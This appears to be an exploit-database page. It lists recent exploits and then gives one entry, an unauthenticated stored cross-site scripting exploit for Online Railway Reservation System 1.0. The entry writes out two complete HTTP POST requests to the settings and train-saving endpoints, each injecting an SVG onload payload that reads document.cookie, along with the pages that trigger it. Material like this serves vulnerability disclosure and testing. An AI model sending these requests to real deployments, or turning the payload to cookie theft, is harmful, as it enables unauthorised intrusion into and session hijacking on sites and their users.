
8 changes to exploits/shellcodes VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass) CoreFTP Server build 725 - Directory Traversal (Authenticated) HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS) Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated) Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated) Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated) Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)
58 lines
No EOL
2.7 KiB
Text
58 lines
No EOL
2.7 KiB
Text
#Exploit Title: Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)
|
|
#Date: 07/01/2022
|
|
#Exploit Author: Zachary Asher
|
|
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
|
|
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
|
|
#Version: 1.0
|
|
#Tested on: Online Railway Reservation System 1.0
|
|
|
|
1)
|
|
=====================================================================================================================================
|
|
To Store XSS (about_us)
|
|
=====================================================================================================================================
|
|
POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
|
|
Host: localhost
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
|
|
Content-Length: 159
|
|
|
|
-----------------------------41914587873111789572282654447
|
|
Content-Disposition: form-data; name="content[about_us]"
|
|
|
|
<svg/onload=alert(document.cookie)>
|
|
|
|
=====================================================================================================================================
|
|
To Trigger Stored XSS (about_us)
|
|
=====================================================================================================================================
|
|
Browse to http://<ip>/orrs/?page=about
|
|
|
|
|
|
2)
|
|
=====================================================================================================================================
|
|
To Store XSS (train code)
|
|
=====================================================================================================================================
|
|
POST /orrs/classes/Master.php?f=save_train HTTP/1.1
|
|
Host: localhost
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------271324269624375374252271437649
|
|
Content-Length: 254
|
|
|
|
-----------------------------271324269624375374252271437649
|
|
Content-Disposition: form-data; name="id"
|
|
|
|
1
|
|
-----------------------------271324269624375374252271437649
|
|
Content-Disposition: form-data; name="code"
|
|
|
|
<svg/onload=alert(document.cookie)>
|
|
|
|
=====================================================================================================================================
|
|
To Trigger XSS (train code)
|
|
=====================================================================================================================================
|
|
Browse to http://localhost/orrs/?page=schedules |